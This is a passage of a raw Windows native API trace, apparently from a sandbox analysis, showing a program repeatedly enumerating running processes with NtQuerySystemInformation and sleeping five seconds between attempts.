[0270.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.257] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 